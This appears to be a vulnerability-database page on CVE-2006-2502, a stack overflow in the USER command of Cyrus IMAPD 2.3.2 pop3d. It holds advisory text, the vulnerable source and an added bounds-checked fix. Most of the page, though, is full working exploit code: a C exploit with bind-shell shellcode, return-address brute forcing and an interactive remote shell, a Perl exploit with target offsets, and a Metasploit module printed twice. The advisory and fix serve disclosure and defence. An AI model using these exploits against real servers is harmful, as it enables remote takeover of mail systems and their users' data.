CVE-2006-2502
CVSS 5.1
Published: 2006-05-22 12:06:00
Revised: 2011-03-07 21:36:19

[Original] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.


[CNNVD] Cyrus IMAPD POP3D Remote Stack Overflow Vulnerability (CNNVD-200605-385)

        Cyrus IMAP Server is a free, open-source implementation of the Interactive Mail Access Protocol (IMAP) for Unix and Linux systems.
        The pop3d daemon of Cyrus-imapd contains a remotely triggerable overflow. If popsubfolders is set to 1 in imapd.conf, an attacker can trigger a stack overflow by sending an over-long argument to the POP3 USER command.
        In cyrus-imapd-2.3.2/imap/pop3d.c, popd_canon_user() is invoked for every USER command with ulen = 0, so the length is taken from strlen(user), that is, from the attacker-supplied string:
        char userbuf[MAX_MAILBOX_NAME+1], *p;
        ...
        if (!ulen) ulen = strlen(user);
        ...
        memcpy(userbuf, user, ulen);
        userbuf[ulen] = '\0';
        
        The routine performs no length check. userbuf holds MAX_MAILBOX_NAME+1 bytes, so when the user string is longer than MAX_MAILBOX_NAME bytes the memcpy (and the NUL store that follows it) runs past the end of userbuf on the stack. The copy is reached only inside the IMAPOPT_POPSUBFOLDERS branch, which is why the popsubfolders option must be enabled.
        --- snip ---
        static int popd_canon_user(sasl_conn_t *conn, void *context,
                                   const char *user, unsigned ulen,
                                   unsigned flags, const char *user_realm,
                                   char *out, unsigned out_max, unsigned *out_ulen)
        {
            char userbuf[MAX_MAILBOX_NAME+1], *p;
            size_t n;
            int r;

            if (!ulen) ulen = strlen(user);

            if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
                /* make a working copy of the auth[z]id */
                memcpy(userbuf, user, ulen);
                userbuf[ulen] = '\0';
                user = userbuf;

                /* See if we're trying to access a subfolder */
                if ((p = strchr(userbuf, '+'))) {
                    n = config_virtdomains ? strcspn(p, "@") : strlen(p);

                    if (flags & SASL_CU_AUTHZID) {
                        /* make a copy of the subfolder */
                        if (popd_subfolder) free(popd_subfolder);
                        popd_subfolder = xstrndup(p, n);
                    }

                    /* strip the subfolder from the auth[z]id */
                    memmove(p, p+n, strlen(p+n)+1);
                    ulen -= n;
                }
            }

            r = mysasl_canon_user(conn, context, user, ulen, flags, user_realm,
                                  out, out_max, out_ulen);

            if (!r && popd_subfolder && flags == SASL_CU_AUTHZID) {
                /* If we're only doing the authzid, put back the subfolder
                   in case its used in the challenge/response calculation */
                n = strlen(popd_subfolder);
                if (*out_ulen + n > out_max) {
                    sasl_seterror(conn, 0, "buffer overflow while canonicalizing");
                    r = SASL_BUFOVER;
                }
                else {
                    p = (config_virtdomains && (p = strchr(out, '@'))) ?
                        p : out + *out_ulen;
                    memmove(p+n, p, strlen(p)+1);
                    memcpy(p, popd_subfolder, n);
                    *out_ulen += n;
                }
            }

            return r;
        }
        --- snip ---
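To make the missing check concrete, the following is an added example written for this page (not cyrus-imapd code): it re-implements the working-copy and "+subfolder" stripping logic of popd_canon_user() with the bounds check that the 2.3.2 routine lacks, parses a raw POP3 USER line into it, and feeds it both a legitimate user+subfolder argument and an over-long line of the same shape as the probe the public exploit sends to test for the bug. MAX_MAILBOX_NAME is assumed to be 490 here (check imap/mailbox.h of the build you are examining; the value does not change the logic), and the function names and return codes are this example's own.

```c
/*
 * Added example, not cyrus-imapd code: the working-copy and "+subfolder"
 * handling of popd_canon_user() rewritten with the length check that
 * cyrus-imapd 2.3.2 lacks. Function names and return codes are this
 * example's own.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_MAILBOX_NAME 490   /* assumed value; see imap/mailbox.h of the build */

enum { CANON_OK = 0, CANON_BUFOVER = -1, CANON_SYNTAX = -2 };

/*
 * Canonicalize a POP3 user argument with popsubfolders semantics.
 * user/ulen: the argument (ulen == 0 means "use strlen", as in Cyrus);
 * virtdomains: when set, the subfolder ends at the first '@';
 * out/sub: receive the stripped authid and the "+subfolder" part.
 */
int canon_user_checked(const char *user, unsigned ulen, int virtdomains,
                       char *out, size_t out_max, char *sub, size_t sub_max)
{
    char userbuf[MAX_MAILBOX_NAME + 1], *p;
    size_t n;

    if (!ulen) ulen = (unsigned)strlen(user);

    /* The check 2.3.2 does not have: userbuf[ulen] must lie inside userbuf. */
    if (ulen > MAX_MAILBOX_NAME) return CANON_BUFOVER;

    memcpy(userbuf, user, ulen);        /* working copy, now provably in bounds */
    userbuf[ulen] = '\0';
    sub[0] = '\0';

    if ((p = strchr(userbuf, '+')) != NULL) {
        n = virtdomains ? strcspn(p, "@") : strlen(p);
        if (n >= sub_max) return CANON_BUFOVER;
        memcpy(sub, p, n);
        sub[n] = '\0';
        memmove(p, p + n, strlen(p + n) + 1);   /* strip "+subfolder" from the authid */
        ulen -= (unsigned)n;
    }

    if (ulen >= out_max) return CANON_BUFOVER;
    memcpy(out, userbuf, ulen + 1);     /* includes the terminating NUL */
    return CANON_OK;
}

/* Parse one POP3 command line ("USER <arg>\r\n") and canonicalize <arg>. */
int canon_pop3_user_line(const char *line, int virtdomains,
                         char *out, size_t out_max, char *sub, size_t sub_max)
{
    static const char kw[] = "USER ";
    size_t i, len;

    for (i = 0; i < 5; i++)             /* command keyword is case-insensitive */
        if (toupper((unsigned char)line[i]) != kw[i]) return CANON_SYNTAX;
    len = strcspn(line + 5, "\r\n");
    if (len == 0) return CANON_SYNTAX;
    return canon_user_checked(line + 5, (unsigned)len, virtdomains,
                              out, out_max, sub, sub_max);
}

/* Returns 1 when the line canonicalizes to the expected authid and subfolder. */
int canon_line_matches(const char *line, int virtdomains,
                       const char *want_out, const char *want_sub)
{
    char out[MAX_MAILBOX_NAME + 1], sub[MAX_MAILBOX_NAME + 1];
    if (canon_pop3_user_line(line, virtdomains, out, sizeof out, sub, sizeof sub) != CANON_OK)
        return 0;
    return strcmp(out, want_out) == 0 && strcmp(sub, want_sub) == 0;
}

/*
 * Build "USER " + n x 'A' + CRLF, the shape of the probe the public exploit
 * sends to decide whether a server is vulnerable, and report what the
 * checked canonicalizer does with it.
 */
int canon_result_for_user_len(size_t n)
{
    char line[2048], out[MAX_MAILBOX_NAME + 1], sub[MAX_MAILBOX_NAME + 1];

    if (n + 8 > sizeof line) return CANON_BUFOVER;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 3);
    return canon_pop3_user_line(line, 0, out, sizeof out, sub, sizeof sub);
}

int main(void)
{
    /* Constructed inputs for the demonstration. */
    printf("alice+INBOX.work@example.com (virtdomains): %s\n",
           canon_line_matches("USER alice+INBOX.work@example.com\r\n", 1,
                              "alice@example.com", "+INBOX.work") ? "ok" : "mismatch");
    printf("%d-byte user: %s\n", MAX_MAILBOX_NAME,
           canon_result_for_user_len(MAX_MAILBOX_NAME) == CANON_OK ? "accepted" : "rejected");
    printf("%d-byte user: %s\n", MAX_MAILBOX_NAME + 1,
           canon_result_for_user_len(MAX_MAILBOX_NAME + 1) == CANON_OK ? "accepted" : "rejected");
    printf("1016-byte probe: %s\n",
           canon_result_for_user_len(1016) == CANON_OK ? "accepted" : "rejected");
    return 0;
}
```

The single added comparison (ulen > MAX_MAILBOX_NAME) is what turns the unchecked memcpy into a bounded one; everything after it, including the memmove that strips the subfolder, then operates on a NUL-terminated buffer of known size. Note that the legitimate "+subfolder" syntax is still accepted, so the check does not break the popsubfolders feature itself.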
        

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [possible performance degradation or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2502
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2502
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-385
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/1891
(UNKNOWN)  VUPEN  ADV-2006-1891
http://www.securityfocus.com/bid/18056
(UNKNOWN)  BID  18056
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
(UNKNOWN)  FULLDISC  20060521 Cyrus IMAPD pop3d remote compromise aka cyrusFUCK3d
http://xforce.iss.net/xforce/xfdb/26578
(UNKNOWN)  XF  cyrus-imap-pop3d-bo(26578)
http://securitytracker.com/id?1016131
(UNKNOWN)  SECTRACK  1016131

- Vulnerability information (CNNVD)

Cyrus IMAPD POP3D Remote Stack Overflow Vulnerability
Medium severity; buffer overflow
2006-05-22 00:00:00 2006-05-22 00:00:00
Remote

- Advisories and patches

        At the time of this entry the vendor had not released a patch or upgrade; users of this software should watch the vendor's home page for the latest version:
        http://asg.web.cmu.edu/cyrus/
        Note that the unchecked copy in popd_canon_user() is reached only when popsubfolders is enabled, and that the OSVDB entry below reports the issue as fixed in version 2.3.4.

- Vulnerability information (EDB 1813)

Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (EDBID:1813)
linux remote
2006-05-21 Verified
110 Kingcope
N/A
/* zeroday warez
 * !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
 *********************************************
 * cyruspop3d.c - cyrus pop3d remote exploit by kcope
 * tested on cyrus-imapd-2.3.2,linux
 *
 * bug found 23 Apr 2006 by kcope
 *--------------------------------------------
 *
 * imapd/pop3d.c line 1830 :
 * char userbuf[MAX_MAILBOX_NAME+1], *p;
 * ...
 * if (!ulen) ulen = strlen(user);
 *   if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
 *    memcpy(userbuf, user, ulen);
 *    userbuf[ulen] = '\0';
 * ...
 * popsubfolders has to be enabled
 *
 * thnx to blackzero revoguard wY! qobaiashi bogus alex
 * Love to Lisa :-)
 *********************************************
 * !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define POP3PORT 110
#define BINDPORT 13370

unsigned char shellcode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";

int do_connect (char *remotehost, int port)
{
   static struct hostent *host;
   static struct sockaddr_in addr;
   static int done=0;
   int s;

   if (!inet_aton(remotehost, &addr.sin_addr) && (done != 1))
   {
       host = gethostbyname(remotehost);
       if (!host)
       {
           perror("gethostbyname() failed");
           return -1;
       }
       addr.sin_addr = *(struct in_addr*)host->h_addr;
   }

   s = socket(PF_INET, SOCK_STREAM, 0);
   if (s == -1)
   {
       close(s);
       perror("socket() failed");
       return -1;
   }

   addr.sin_port = htons(port);
   addr.sin_family = AF_INET;

   if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
   {
       close(s);
       if (port == POP3PORT) perror("connect() failed");
       return -1;
   }

   done=1;
   return s;
}

void do_exploit(int sock, unsigned int returnaddr)
{
   char nops[360];
   char nops2[100];
   char exploitbuffer[1024];
   char recvbuf[30];

   memset(&nops[0], '\0', sizeof(nops));
   memset(&nops[0], 'A', 352);
   memset(&nops2[0], '\0', sizeof(nops2));
   memset(&nops2[0], 'A', 90);

   while (1) {
       recv(sock, recvbuf, 1, 0);
       if ((recvbuf[0] == '\r') || (recvbuf[0] == '\n')) break;
   }

   sprintf(exploitbuffer, "USER %s%s%s\r\n", nops, shellcode, nops2);

   exploitbuffer[strlen(exploitbuffer)-1] = (returnaddr >> 24) & 0xff;
   exploitbuffer[strlen(exploitbuffer)-2] = (returnaddr >> 16) & 0xff;
   exploitbuffer[strlen(exploitbuffer)-3] = (returnaddr >> 8) & 0xff;
   exploitbuffer[strlen(exploitbuffer)-4] = (returnaddr) & 0xff;

   send(sock, exploitbuffer, strlen(exploitbuffer), 0);
   recv(sock, recvbuf, sizeof(recvbuf)-1, 0);
}

int do_checkvulnerable(int sock) {
   char checkbuffer[1024];
   char recvbuffer[10];

   memset(&checkbuffer[0], '\0', sizeof(checkbuffer)-1);
   memset(&checkbuffer[0], 'A', sizeof(checkbuffer)-2);
   checkbuffer[0]='U';
   checkbuffer[1]='S';
   checkbuffer[2]='E';
   checkbuffer[3]='R';
   checkbuffer[4]=' ';
   checkbuffer[sizeof(checkbuffer)-3]='\r';
   checkbuffer[sizeof(checkbuffer)-2]='\n';

   while (1) {
       recv(sock, recvbuffer, 1, 0);
       if ((recvbuffer[0] == '\r') || (recvbuffer[0] == '\n')) break;
   }

   send(sock, checkbuffer, strlen(checkbuffer), 0);

   if (recv(sock, recvbuffer, sizeof(recvbuffer)-1, MSG_WAITALL) < 3)
       return 0;

   return -1;
}

int do_remote_shell(int sockfd)
{
   while(1)
        {
           fd_set fds;
           FD_ZERO(&fds);
           FD_SET(0,&fds);
           FD_SET(sockfd,&fds);
           if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
           {
              int cnt;
              char buf[1024];
              if(FD_ISSET(0,&fds))
              {
                 if((cnt=read(0,buf,1024))<1)
                 {
                    if(errno==EWOULDBLOCK||errno==EAGAIN)
                      continue;
                    else
                      break;
                 }
                 write(sockfd,buf,cnt);
              }
              if(FD_ISSET(sockfd,&fds))
              {
                 if((cnt=read(sockfd,buf,1024))<1)
                 {
                      if(errno==EWOULDBLOCK||errno==EAGAIN)
                        continue;
                      else
                        break;
                 }
                 write(1,buf,cnt);
              }
           }
        }
   return 0;
}

int main(int argc, char **argv)
{
   char remotehost[255];
   int s,s2,i;
   unsigned int returnaddr;

   printf("cyrus pop3d remote exploit [kcope/2006]\n");

   if (argc < 3) {
       printf("usage: %s <remote host> <brute force start return address>\n", argv[0]);
       printf("eg: %s localhost bfffa000\n", argv[0]);
       return 1;
   }

   strcpy(remotehost, argv[1]); //uhoho
   if (sscanf(argv[2], "%8x", &returnaddr) == 0) {
       printf("Specify valid start return address\n");
       return 1;
   }

   printf("Checking if vulnerable... ");
   s=do_connect(remotehost, POP3PORT);
   if (s == -1)
       return 1;
   if (do_checkvulnerable(s) == -1) {
       close(s);
       printf("\ncyrus pop3d seems not to be vulnerable\nno popsubfolders defined at remote host?\n");
       return 1;
   }
   close(s);
   printf("SUCCESS!\n");

   while (returnaddr < 0xbfffffff) {
       returnaddr+=16;

       printf("CRACKADDR = %08x\n", returnaddr);
       fflush(stdout);
       s=do_connect(remotehost, POP3PORT);
       if (s==-1)
           return 1;

       do_exploit(s, returnaddr);
       for (i=0;i<2;i++) {
           if ((s2=do_connect(remotehost, BINDPORT)) != -1) {
               printf("\nALEX,ALEX WE GOT IT!!!\n");
               do_remote_shell(s2);
               return 0;
           }
           close(s2);
       }

       close(s);
   }

   return 0;
}

// milw0rm.com [2006-05-21]
		

- Vulnerability information (EDB 2185)

Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3) (EDBID:2185)
linux remote
2006-08-14 Verified
110 K-sPecial
N/A
#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
## 
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
##  exploits and neither of them worked (not that they don't, but coding my own is generally faster
##  and easier) so I coded my own. The exploit by kcope seems to be done right and maybe I just got really
##  unlucky and missed the offset in between the 5 runs I gave it. The one from bannedit was interesting...
##  really nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
##  when I was writing this exploit with the same method, and I placed my shellcode in GOT, functions before
##  the return from the vuln function were segfaulting first by trying to actually *use* the GOT! So what I have
##  done here is used the same method, yet found a data area that is not going to freak pop3d
##  out before it gets to the return. Specifically I use part of the .data segment (or was it .bss, anyway) labeled
##  'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
##
## Other: Basically what all this means is you just have to give an offset that is a location in memory that
##  is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
##  that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
##  shellcode (because it'll segfault and won't get executed).
##
## Note: bindport is 13370
#################################################################################################################
use IO::Socket;
use strict;

my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;

# stolen from cyruspop3d.c because this actually worked, I couldn't get any
# metasploit sc to work (as usual, hmph)
my $shellcode = 
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96".
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56".
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1".
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0".
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53".
"\x89\xe1\xcd\x80";

my $sock = IO::Socket::INET->new('PeerAddr' => $host,
                                 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");

$sock->autoflush();

print $sock "USER ";                       ## begin USER command with just that
print $sock "$shellcode";                  ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "\n";                          ## that simple

sub help {
	print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
	print "08/12/2006\n\n";
	print "perl $0 \$host \$offset\n\n";
	
	print "Offsets: \n";
	print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";

	exit(0);
}

# milw0rm.com [2006-08-14]
		

- Vulnerability information (EDB 16836)

Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow (EDBID:16836)
linux remote
2010-04-30 Verified
0 metasploit
N/A
##
# $Id: cyrus_pop3d_popsubfolders.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
			'Description'    => %q{
					This exploit takes advantage of a stack based overflow.  Once the stack
				corruption has occurred it is possible to overwrite a pointer which is
				later used for a memcpy. This gives us a write anything anywhere condition
				similar to a format string vulnerability.

				NOTE: The popsubfolders option is a non-default setting.

				I chose to overwrite the GOT with my shellcode and return to it. This
				defeats the VA random patch and possibly other stack protection features.

				Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with
				a version containing the vulnerable code, it is not exploitable due to the
				use of the FORTIFY_SOURCE compiler enhancement
			},
			'Author'         => [ 'bannedit', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-2502' ],
					[ 'OSVDB', '25853' ],
					[ 'BID', '18056' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2053' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2185' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html' ],
				],
			'Payload'	=>
				{
					'Space'	=> 250,
					'DisableNops' => true,
				},
			'Platform'	=> 'linux',
			'Targets'	=>
				[
					# bannedit: 0x080fd204
					# K-sPecial: 0x8106c20 (debian 3.1 - 2.6.16-rc6)
					[ 'Gentoo 2006.0 Linux 2.6', { 'Ret' => 0x080fd318 } ],
				],
			'Privileged'		=> true,
			'DisclosureDate'	=> 'May 21 2006',
			'DefaultTarget'	=> 0))

		register_options( [ Opt::RPORT(110) ], self.class )
	end



	def exploit

		connect

		print_status "Banner: #{banner = sock.gets}"

		# NOTE: orig poc shellcode len: 84

		# kcope: 352+84+86+4 (nops,sc,nops,ret)
		# K-sPecial: 84+(120*4) (sc,addrs)
		# bannedit: 265+8+250+29+16
		shellcode = payload.encoded

		buf = "USER "
		buf << make_nops(265)
		# return address
		buf << [target.ret].pack('V') * 2
		buf << make_nops(250 - shellcode.length)
		buf << shellcode
		buf << make_nops(29)
		sc_addr = target.ret - 277
		buf << [sc_addr].pack('V') * 4
		buf << "\r\n"

		sock.send(buf, 0)
		disconnect

	end

end
		

- Vulnerability information (PacketStorm F84584)

Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow (PacketStormID:F84584)
2009-12-31 00:00:00
bannedit,jduck  metasploit.com
exploit,overflow
CVE-2006-2502

This exploit takes advantage of a stack based overflow. Once the stack corruption has occurred it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
			'Description'    => %q{
					This exploit takes advantage of a stack based overflow.  Once the stack 
				corruption has occurred it is possible to overwrite a pointer which is
				later used for a memcpy. This gives us a write anything anywhere condition 
				similar to a format string vulnerability.

				NOTE: The popsubfolders option is a non-default setting.

				I chose to overwrite the GOT with my shellcode and return to it. This 
				defeats the VA random patch and possibly other stack protection features.

				Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with
				a version containing the vulnerable code, it is not exploitable due to the
				use of the FORTIFY_SOURCE compiler enhancement
			},
			'Author'         => [ 'bannedit', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7884 $',
			'References'     =>
				[
					[ 'CVE', '2006-2502' ],
					[ 'OSVDB', '25853' ],
					[ 'BID', '18056' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2053' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/2185' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html' ],
				],
			'Payload'	=>
				{
					'Space'	=> 250,
					'DisableNops' => true,
				},
			'Platform'	=> 'linux',
			'Targets'	=>
				[
					# bannedit: 0x080fd204
					# K-sPecial: 0x8106c20 (debian 3.1 - 2.6.16-rc6)
					[ 'Gentoo 2006.0 Linux 2.6', { 'Ret' => 0x080fd318 } ],
				],
			'Privileged'		=> true,
			'DisclosureDate'	=> 'May 21 2006',
			'DefaultTarget'	=> 0))

		register_options( [ Opt::RPORT(110) ], self.class )
	end



	def exploit
	 
		connect

		print_status "Banner: #{banner = sock.gets}"

		# NOTE: orig poc shellcode len: 84
		
		# kcope: 352+84+86+4 (nops,sc,nops,ret)
		# K-sPecial: 84+(120*4) (sc,addrs)
		# bannedit: 265+8+250+29+16
		shellcode = payload.encoded
		
		buf = "USER "
		buf << make_nops(265)
		# return address
		buf << [target.ret].pack('V') * 2
		buf << make_nops(250 - shellcode.length)
		buf << shellcode
		buf << make_nops(29)
		sc_addr = target.ret - 277
		buf << [sc_addr].pack('V') * 4
		buf << "\r\n"

		sock.send(buf, 0)
		disconnect

	end

end
    

- Vulnerability information (OSVDB)

25853
Cyrus IMAPD pop3d USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

Cyrus IMAPD contains an overflow condition in the pop3d service. The issue is triggered as user-supplied input to the USER command is not properly validated. With a specially crafted request, a remote attacker can cause a stack-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.

- Timeline

2006-05-21 Unknown
2006-05-21 Unknown

- Solution

Upgrade to version 2.3.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community devoted to SCAP. For more information see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.